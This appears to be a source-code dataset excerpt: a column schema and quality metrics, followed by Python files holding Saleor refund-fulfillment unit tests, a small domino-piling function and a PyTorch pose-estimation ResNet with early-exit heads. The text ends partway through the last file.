hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
6710871400f55972cf1add7ad3bc2c48cbb9460b
| 9,314
|
py
|
Python
|
saleor/order/tests/test_order_actions_refund_products.py
|
fairhopeweb/saleor
|
9ac6c22652d46ba65a5b894da5f1ba5bec48c019
|
[
"CC-BY-4.0"
] | 15,337
|
2015-01-12T02:11:52.000Z
|
2021-10-05T19:19:29.000Z
|
saleor/order/tests/test_order_actions_refund_products.py
|
fairhopeweb/saleor
|
9ac6c22652d46ba65a5b894da5f1ba5bec48c019
|
[
"CC-BY-4.0"
] | 7,486
|
2015-02-11T10:52:13.000Z
|
2021-10-06T09:37:15.000Z
|
saleor/order/tests/test_order_actions_refund_products.py
|
aminziadna/saleor
|
2e78fb5bcf8b83a6278af02551a104cfa555a1fb
|
[
"CC-BY-4.0"
] | 5,864
|
2015-01-16T14:52:54.000Z
|
2021-10-05T23:01:15.000Z
|
from decimal import Decimal
from unittest.mock import ANY, patch
from ...payment import ChargeStatus
from ...plugins.manager import get_plugins_manager
from ...tests.utils import flush_post_commit_hooks
from ...warehouse.models import Allocation
from .. import FulfillmentLineData, FulfillmentStatus, OrderLineData
from ..actions import create_refund_fulfillment
from ..models import FulfillmentLine
@patch("saleor.plugins.manager.PluginsManager.order_updated")
@patch("saleor.order.actions.gateway.refund")
def test_create_refund_fulfillment_only_order_lines(
mocked_refund, mocked_order_updated, order_with_lines, payment_dummy
):
payment_dummy.captured_amount = payment_dummy.total
payment_dummy.charge_status = ChargeStatus.FULLY_CHARGED
payment_dummy.save()
order_with_lines.payments.add(payment_dummy)
payment = order_with_lines.get_last_payment()
order_lines_to_refund = order_with_lines.lines.all()
original_quantity = {
line.id: line.quantity_unfulfilled for line in order_with_lines.lines.all()
}
order_line_ids = order_lines_to_refund.values_list("id", flat=True)
original_allocations = list(
Allocation.objects.filter(order_line_id__in=order_line_ids)
)
lines_count = order_with_lines.lines.count()
returned_fulfillemnt = create_refund_fulfillment(
user=None,
app=None,
order=order_with_lines,
payment=payment,
order_lines_to_refund=[
OrderLineData(line=line, quantity=2) for line in order_lines_to_refund
],
fulfillment_lines_to_refund=[],
manager=get_plugins_manager(),
)
flush_post_commit_hooks()
returned_fulfillment_lines = returned_fulfillemnt.lines.all()
assert returned_fulfillemnt.status == FulfillmentStatus.REFUNDED
assert len(returned_fulfillment_lines) == lines_count
for fulfillment_line in returned_fulfillment_lines:
assert fulfillment_line.quantity == 2
assert fulfillment_line.order_line_id in order_line_ids
for line in order_lines_to_refund:
assert line.quantity_unfulfilled == original_quantity.get(line.pk) - 2
current_allocations = Allocation.objects.in_bulk(
[allocation.pk for allocation in original_allocations]
)
for original_allocation in original_allocations:
current_allocation = current_allocations.get(original_allocation.pk)
assert (
original_allocation.quantity_allocated - 2
== current_allocation.quantity_allocated
)
amount = sum([line.unit_price_gross_amount * 2 for line in order_lines_to_refund])
assert returned_fulfillemnt.total_refund_amount == amount
assert returned_fulfillemnt.shipping_refund_amount is None
mocked_refund.assert_called_once_with(
payment_dummy, ANY, amount=amount, channel_slug=order_with_lines.channel.slug
)
mocked_order_updated.assert_called_once_with(order_with_lines)
@patch("saleor.plugins.manager.PluginsManager.order_updated")
@patch("saleor.order.actions.gateway.refund")
def test_create_refund_fulfillment_included_shipping_costs(
mocked_refund, mocked_order_updated, order_with_lines, payment_dummy
):
payment_dummy.captured_amount = payment_dummy.total
payment_dummy.charge_status = ChargeStatus.FULLY_CHARGED
payment_dummy.save()
order_with_lines.payments.add(payment_dummy)
payment = order_with_lines.get_last_payment()
order_lines_to_refund = order_with_lines.lines.all()
original_quantity = {
line.id: line.quantity_unfulfilled for line in order_with_lines.lines.all()
}
order_line_ids = order_lines_to_refund.values_list("id", flat=True)
lines_count = order_with_lines.lines.count()
returned_fulfillemnt = create_refund_fulfillment(
user=None,
app=None,
order=order_with_lines,
payment=payment,
order_lines_to_refund=[
OrderLineData(line=line, quantity=2) for line in order_lines_to_refund
],
fulfillment_lines_to_refund=[],
manager=get_plugins_manager(),
refund_shipping_costs=True,
)
flush_post_commit_hooks()
returned_fulfillment_lines = returned_fulfillemnt.lines.all()
assert returned_fulfillemnt.status == FulfillmentStatus.REFUNDED
assert len(returned_fulfillment_lines) == lines_count
for fulfillment_line in returned_fulfillment_lines:
assert fulfillment_line.quantity == 2
assert fulfillment_line.order_line_id in order_line_ids
for line in order_lines_to_refund:
assert line.quantity_unfulfilled == original_quantity.get(line.pk) - 2
amount = sum([line.unit_price_gross_amount * 2 for line in order_lines_to_refund])
amount += order_with_lines.shipping_price_gross_amount
assert returned_fulfillemnt.total_refund_amount == amount
assert (
returned_fulfillemnt.shipping_refund_amount
== order_with_lines.shipping_price_gross_amount
)
mocked_refund.assert_called_once_with(
payment_dummy, ANY, amount=amount, channel_slug=order_with_lines.channel.slug
)
mocked_order_updated.assert_called_once_with(order_with_lines)
@patch("saleor.plugins.manager.PluginsManager.order_updated")
@patch("saleor.order.actions.gateway.refund")
def test_create_refund_fulfillment_only_fulfillment_lines(
mocked_refund, mocked_order_updated, fulfilled_order, payment_dummy
):
payment_dummy.captured_amount = payment_dummy.total
payment_dummy.charge_status = ChargeStatus.FULLY_CHARGED
payment_dummy.save()
fulfilled_order.payments.add(payment_dummy)
payment = fulfilled_order.get_last_payment()
order_line_ids = fulfilled_order.lines.all().values_list("id", flat=True)
fulfillment_lines = FulfillmentLine.objects.filter(order_line_id__in=order_line_ids)
original_quantity = {line.id: line.quantity for line in fulfillment_lines}
fulfillment_lines_to_refund = fulfillment_lines
returned_fulfillemnt = create_refund_fulfillment(
user=None,
app=None,
order=fulfilled_order,
payment=payment,
order_lines_to_refund=[],
fulfillment_lines_to_refund=[
FulfillmentLineData(line=line, quantity=2)
for line in fulfillment_lines_to_refund
],
manager=get_plugins_manager(),
)
flush_post_commit_hooks()
returned_fulfillment_lines = returned_fulfillemnt.lines.all()
assert returned_fulfillemnt.status == FulfillmentStatus.REFUNDED
assert len(returned_fulfillment_lines) == len(order_line_ids)
for fulfillment_line in returned_fulfillment_lines:
assert fulfillment_line.quantity == 2
assert fulfillment_line.order_line_id in order_line_ids
for line in fulfillment_lines:
assert line.quantity == original_quantity.get(line.pk) - 2
amount = sum(
[line.order_line.unit_price_gross_amount * 2 for line in fulfillment_lines]
)
mocked_refund.assert_called_once_with(
payment_dummy, ANY, amount=amount, channel_slug=fulfilled_order.channel.slug
)
mocked_order_updated.assert_called_once_with(fulfilled_order)
assert returned_fulfillemnt.total_refund_amount == amount
assert returned_fulfillemnt.shipping_refund_amount is None
@patch("saleor.plugins.manager.PluginsManager.order_updated")
@patch("saleor.order.actions.gateway.refund")
def test_create_refund_fulfillment_custom_amount(
mocked_refund, mocked_order_updated, fulfilled_order, payment_dummy
):
payment_dummy.captured_amount = payment_dummy.total
payment_dummy.charge_status = ChargeStatus.FULLY_CHARGED
payment_dummy.save()
fulfilled_order.payments.add(payment_dummy)
payment = fulfilled_order.get_last_payment()
order_line_ids = fulfilled_order.lines.all().values_list("id", flat=True)
fulfillment_lines = FulfillmentLine.objects.filter(order_line_id__in=order_line_ids)
original_quantity = {line.id: line.quantity for line in fulfillment_lines}
fulfillment_lines_to_refund = fulfillment_lines
amount = Decimal("10.00")
returned_fulfillemnt = create_refund_fulfillment(
user=None,
app=None,
order=fulfilled_order,
payment=payment,
order_lines_to_refund=[],
fulfillment_lines_to_refund=[
FulfillmentLineData(line=line, quantity=2)
for line in fulfillment_lines_to_refund
],
manager=get_plugins_manager(),
amount=amount,
)
flush_post_commit_hooks()
returned_fulfillment_lines = returned_fulfillemnt.lines.all()
assert returned_fulfillemnt.status == FulfillmentStatus.REFUNDED
assert len(returned_fulfillment_lines) == len(order_line_ids)
for fulfillment_line in returned_fulfillment_lines:
assert fulfillment_line.quantity == 2
assert fulfillment_line.order_line_id in order_line_ids
for line in fulfillment_lines:
assert line.quantity == original_quantity.get(line.pk) - 2
mocked_refund.assert_called_once_with(
payment_dummy, ANY, amount=amount, channel_slug=fulfilled_order.channel.slug
)
mocked_order_updated.assert_called_once_with(fulfilled_order)
assert returned_fulfillemnt.total_refund_amount == amount
assert returned_fulfillemnt.shipping_refund_amount is None
| 41.030837
| 88
| 0.761434
| 1,148
| 9,314
| 5.777003
| 0.086237
| 0.072376
| 0.043124
| 0.037998
| 0.889777
| 0.889777
| 0.885856
| 0.885856
| 0.885856
| 0.860676
| 0
| 0.002579
| 0.167275
| 9,314
| 226
| 89
| 41.212389
| 0.852501
| 0
| 0
| 0.778894
| 0
| 0
| 0.038329
| 0.036934
| 0
| 0
| 0
| 0
| 0.18593
| 1
| 0.020101
| false
| 0
| 0.045226
| 0
| 0.065327
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e1db6db60fb5659ad7667ae2eaa91acd20ecfb6b
| 119
|
py
|
Python
|
sorting/domino_piling.py
|
elenaborisova/A2SV-interview-prep
|
02b7166a96d22221cd6adaedf14f845537f0752d
|
[
"MIT"
] | null | null | null |
sorting/domino_piling.py
|
elenaborisova/A2SV-interview-prep
|
02b7166a96d22221cd6adaedf14f845537f0752d
|
[
"MIT"
] | null | null | null |
sorting/domino_piling.py
|
elenaborisova/A2SV-interview-prep
|
02b7166a96d22221cd6adaedf14f845537f0752d
|
[
"MIT"
] | null | null | null |
def domino_piling(m, n):
return (m * n) // 2
# Test cases:
print(domino_piling(3, 3))
print(domino_piling(2, 4))
| 14.875
| 26
| 0.638655
| 21
| 119
| 3.47619
| 0.571429
| 0.493151
| 0.465753
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.051546
| 0.184874
| 119
| 7
| 27
| 17
| 0.701031
| 0.092437
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0.25
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
|
0
| 7
|
c021064b1f7e59319e1690324538dc33a2bdc46b
| 39,248
|
py
|
Python
|
Train/pose_estimation/lib/models/pose_resnet.py
|
ZSL98/ETBA
|
618317698adb9e372fb11dc0c3a01f856e0759b0
|
[
"MIT"
] | 1
|
2021-12-01T15:22:44.000Z
|
2021-12-01T15:22:44.000Z
|
Train/pose_estimation/lib/models/pose_resnet.py
|
ZSL98/ETBA
|
618317698adb9e372fb11dc0c3a01f856e0759b0
|
[
"MIT"
] | null | null | null |
Train/pose_estimation/lib/models/pose_resnet.py
|
ZSL98/ETBA
|
618317698adb9e372fb11dc0c3a01f856e0759b0
|
[
"MIT"
] | null | null | null |
# ------------------------------------------------------------------------------
# Copyright (c) Microsoft
# Licensed under the MIT License.
# Written by Bin Xiao (Bin.Xiao@microsoft.com)
# ------------------------------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import logging
import copy
import torch
import torch.nn as nn
from collections import OrderedDict
import sys
sys.path.append("/home/slzhang/projects/ETBA/Inference/src/exit_placement")
from networks import backbone_s1, backbone_s2, Bottleneck
BN_MOMENTUM = 0.1
logger = logging.getLogger(__name__)
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
# class Bottleneck(nn.Module):
# expansion = 4
# def __init__(self, inplanes, planes, stride=1, downsample=None):
# super(Bottleneck, self).__init__()
# self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
# self.bn1 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
# self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
# padding=1, bias=False)
# self.bn2 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
# self.conv3 = nn.Conv2d(planes, planes * self.expansion, kernel_size=1,
# bias=False)
# self.bn3 = nn.BatchNorm2d(planes * self.expansion,
# momentum=BN_MOMENTUM)
# self.relu = nn.ReLU(inplace=True)
# self.downsample = downsample
# self.stride = stride
# def forward(self, x):
# residual = x
# out = self.conv1(x)
# out = self.bn1(out)
# out = self.relu(out)
# out = self.conv2(out)
# out = self.bn2(out)
# out = self.relu(out)
# out = self.conv3(out)
# out = self.bn3(out)
# if self.downsample is not None:
# residual = self.downsample(x)
# out += residual
# out = self.relu(out)
# return out
class Bottleneck_CAFFE(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(Bottleneck_CAFFE, self).__init__()
# add stride to conv1x1
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, stride=stride, bias=False)
self.bn1 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=1,
padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
self.conv3 = nn.Conv2d(planes, planes * self.expansion, kernel_size=1,
bias=False)
self.bn3 = nn.BatchNorm2d(planes * self.expansion,
momentum=BN_MOMENTUM)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class PoseResNet(nn.Module):
def __init__(self, block, layers, cfg, **kwargs):
self.inplanes = 64
extra = cfg.MODEL.EXTRA
self.deconv_with_bias = extra.DECONV_WITH_BIAS
super(PoseResNet, self).__init__()
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(64, momentum=BN_MOMENTUM)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
# used for deconv layers
self.deconv_layers = self._make_deconv_layer(
extra.NUM_DECONV_LAYERS,
extra.NUM_DECONV_FILTERS,
extra.NUM_DECONV_KERNELS,
)
self.final_layer = nn.Conv2d(
in_channels=extra.NUM_DECONV_FILTERS[-1],
out_channels=cfg.MODEL.NUM_JOINTS,
kernel_size=extra.FINAL_CONV_KERNEL,
stride=1,
padding=1 if extra.FINAL_CONV_KERNEL == 3 else 0
)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion, momentum=BN_MOMENTUM),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def _get_deconv_cfg(self, deconv_kernel, index):
if deconv_kernel == 4:
padding = 1
output_padding = 0
elif deconv_kernel == 3:
padding = 1
output_padding = 1
elif deconv_kernel == 2:
padding = 0
output_padding = 0
return deconv_kernel, padding, output_padding
def _make_deconv_layer(self, num_layers, num_filters, num_kernels):
assert num_layers == len(num_filters), \
'ERROR: num_deconv_layers is different len(num_deconv_filters)'
assert num_layers == len(num_kernels), \
'ERROR: num_deconv_layers is different len(num_deconv_filters)'
layers = []
for i in range(num_layers):
kernel, padding, output_padding = \
self._get_deconv_cfg(num_kernels[i], i)
planes = num_filters[i]
layers.append(
nn.ConvTranspose2d(
in_channels=self.inplanes,
out_channels=planes,
kernel_size=kernel,
stride=2,
padding=padding,
output_padding=output_padding,
bias=self.deconv_with_bias))
layers.append(nn.BatchNorm2d(planes, momentum=BN_MOMENTUM))
layers.append(nn.ReLU(inplace=True))
self.inplanes = planes
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.deconv_layers(x)
x = self.final_layer(x)
return x
def init_weights(self, pretrained=''):
if os.path.isfile(pretrained):
logger.info('=> init deconv weights from normal distribution')
for name, m in self.deconv_layers.named_modules():
if isinstance(m, nn.ConvTranspose2d):
logger.info('=> init {}.weight as normal(0, 0.001)'.format(name))
logger.info('=> init {}.bias as 0'.format(name))
nn.init.normal_(m.weight, std=0.001)
if self.deconv_with_bias:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
logger.info('=> init {}.weight as 1'.format(name))
logger.info('=> init {}.bias as 0'.format(name))
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
logger.info('=> init final conv weights from normal distribution')
for m in self.final_layer.modules():
if isinstance(m, nn.Conv2d):
# nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
logger.info('=> init {}.weight as normal(0, 0.001)'.format(name))
logger.info('=> init {}.bias as 0'.format(name))
nn.init.normal_(m.weight, std=0.001)
nn.init.constant_(m.bias, 0)
# pretrained_state_dict = torch.load(pretrained)
logger.info('=> loading pretrained model {}'.format(pretrained))
# self.load_state_dict(pretrained_state_dict, strict=False)
checkpoint = torch.load(pretrained)
if isinstance(checkpoint, OrderedDict):
state_dict = checkpoint
elif isinstance(checkpoint, dict) and 'state_dict' in checkpoint:
state_dict_old = checkpoint['state_dict']
state_dict = OrderedDict()
# delete 'module.' because it is saved from DataParallel module
for key in state_dict_old.keys():
if key.startswith('module.'):
# state_dict[key[7:]] = state_dict[key]
# state_dict.pop(key)
state_dict[key[7:]] = state_dict_old[key]
else:
state_dict[key] = state_dict_old[key]
else:
raise RuntimeError(
'No state_dict found in checkpoint file {}'.format(pretrained))
self.load_state_dict(state_dict, strict=False)
else:
logger.error('=> imagenet pretrained model dose not exist')
logger.error('=> please download it first')
raise ValueError('imagenet pretrained model does not exist')
class PoseResNetwthExit(nn.Module):
def __init__(self, block, layers, cfg, start_point, **kwargs):
super(PoseResNetwthExit, self).__init__()
extra = cfg.MODEL.EXTRA
self.deconv_with_bias = extra.DECONV_WITH_BIAS
self.backbone_s1 = backbone_s1(start_point=start_point, end_point=33)
# self.backbone_s2 = backbone_s2(start_point=start_point, end_point=start_point)
self.inplanes = 2048
self.deconv_layers = self._make_deconv_layer(
extra.NUM_DECONV_LAYERS,
extra.NUM_DECONV_FILTERS,
extra.NUM_DECONV_KERNELS,
)
self.final_layer = nn.Conv2d(
in_channels=extra.NUM_DECONV_FILTERS[-1],
out_channels=cfg.MODEL.NUM_JOINTS,
kernel_size=extra.FINAL_CONV_KERNEL,
stride=1,
padding=1 if extra.FINAL_CONV_KERNEL == 3 else 0
)
self.inplanes = 2048
self.head_deconv_layers = self._make_deconv_layer(
extra.NUM_DECONV_LAYERS,
extra.NUM_DECONV_FILTERS,
extra.NUM_DECONV_KERNELS,
)
self.head_final_layer = nn.Conv2d(
in_channels=extra.NUM_DECONV_FILTERS[-1],
out_channels=cfg.MODEL.NUM_JOINTS,
kernel_size=extra.FINAL_CONV_KERNEL,
stride=1,
padding=1 if extra.FINAL_CONV_KERNEL == 3 else 0
)
def _get_deconv_cfg(self, deconv_kernel, index):
if deconv_kernel == 4:
padding = 1
output_padding = 0
elif deconv_kernel == 3:
padding = 1
output_padding = 1
elif deconv_kernel == 2:
padding = 0
output_padding = 0
return deconv_kernel, padding, output_padding
def _make_deconv_layer(self, num_layers, num_filters, num_kernels):
assert num_layers == len(num_filters), \
'ERROR: num_deconv_layers is different len(num_deconv_filters)'
assert num_layers == len(num_kernels), \
'ERROR: num_deconv_layers is different len(num_deconv_filters)'
layers = []
for i in range(num_layers):
kernel, padding, output_padding = \
self._get_deconv_cfg(num_kernels[i], i)
planes = num_filters[i]
layers.append(
nn.ConvTranspose2d(
in_channels=self.inplanes,
out_channels=planes,
kernel_size=kernel,
stride=2,
padding=padding,
output_padding=output_padding,
bias=self.deconv_with_bias))
layers.append(nn.BatchNorm2d(planes, momentum=BN_MOMENTUM))
layers.append(nn.ReLU(inplace=True))
self.inplanes = planes
return nn.Sequential(*layers)
def forward(self, input):
x, x_exit = self.backbone_s1(input)
x_exit = self.head_deconv_layers(x_exit)
x_exit = self.head_final_layer(x_exit)
# x = self.backbone_s2(x)
x = self.deconv_layers(x)
x = self.final_layer(x)
return x, x_exit
def init_weights(self, pretrained=''):
if os.path.isfile(pretrained):
logger.info('=> init head deconv weights from normal distribution')
# for name, m in self.named_parameters():
# m.requires_grad = False
for name, m in self.head_deconv_layers.named_modules():
if isinstance(m, nn.ConvTranspose2d):
logger.info('=> init {}.weight as normal(0, 0.001)'.format(name))
logger.info('=> init {}.bias as 0'.format(name))
nn.init.normal_(m.weight, std=0.001)
if self.deconv_with_bias:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
logger.info('=> init {}.weight as 1'.format(name))
logger.info('=> init {}.bias as 0'.format(name))
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
logger.info('=> init head final conv weights from normal distribution')
for m in self.head_final_layer.modules():
if isinstance(m, nn.Conv2d):
# nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
logger.info('=> init {}.weight as normal(0, 0.001)'.format(name))
logger.info('=> init {}.bias as 0'.format(name))
nn.init.normal_(m.weight, std=0.001)
nn.init.constant_(m.bias, 0)
# for name, m in self.head_deconv_layers.named_parameters():
# m.requires_grad = True
# for name, m in self.head_final_layer.named_parameters():
# m.requires_grad = True
# pretrained_state_dict = torch.load(pretrained)
logger.info('=> loading pretrained model {}'.format(pretrained))
# self.load_state_dict(pretrained_state_dict, strict=False)
checkpoint = torch.load(pretrained)
if isinstance(checkpoint, OrderedDict):
state_dict = checkpoint
elif isinstance(checkpoint, dict) and 'state_dict' in checkpoint:
state_dict_old = checkpoint['state_dict']
state_dict = OrderedDict()
# delete 'module.' because it is saved from DataParallel module
for key in state_dict_old.keys():
if key.startswith('module.'):
# state_dict[key[7:]] = state_dict[key]
# state_dict.pop(key)
state_dict[key[7:]] = state_dict_old[key]
else:
state_dict[key] = state_dict_old[key]
else:
raise RuntimeError(
'No state_dict found in checkpoint file {}'.format(pretrained))
self.load_state_dict(state_dict, strict=False)
else:
logger.error('=> imagenet pretrained model dose not exist')
logger.error('=> please download it first')
raise ValueError('imagenet pretrained model does not exist')
class PoseResNetwthOnlyExit(nn.Module):
def __init__(self, block, layers, cfg, start_point, **kwargs):
super(PoseResNetwthOnlyExit, self).__init__()
extra = cfg.MODEL.EXTRA
self.deconv_with_bias = extra.DECONV_WITH_BIAS
self.backbone_s1 = backbone_s1(start_point=start_point, end_point=start_point)
# self.backbone_s2 = backbone_s2(start_point=start_point, end_point=start_point)
self.inplanes = 2048
self.deconv_layers = self._make_deconv_layer(
extra.NUM_DECONV_LAYERS,
extra.NUM_DECONV_FILTERS,
extra.NUM_DECONV_KERNELS,
)
self.final_layer = nn.Conv2d(
in_channels=extra.NUM_DECONV_FILTERS[-1],
out_channels=cfg.MODEL.NUM_JOINTS,
kernel_size=extra.FINAL_CONV_KERNEL,
stride=1,
padding=1 if extra.FINAL_CONV_KERNEL == 3 else 0
)
def _get_deconv_cfg(self, deconv_kernel, index):
if deconv_kernel == 4:
padding = 1
output_padding = 0
elif deconv_kernel == 3:
padding = 1
output_padding = 1
elif deconv_kernel == 2:
padding = 0
output_padding = 0
return deconv_kernel, padding, output_padding
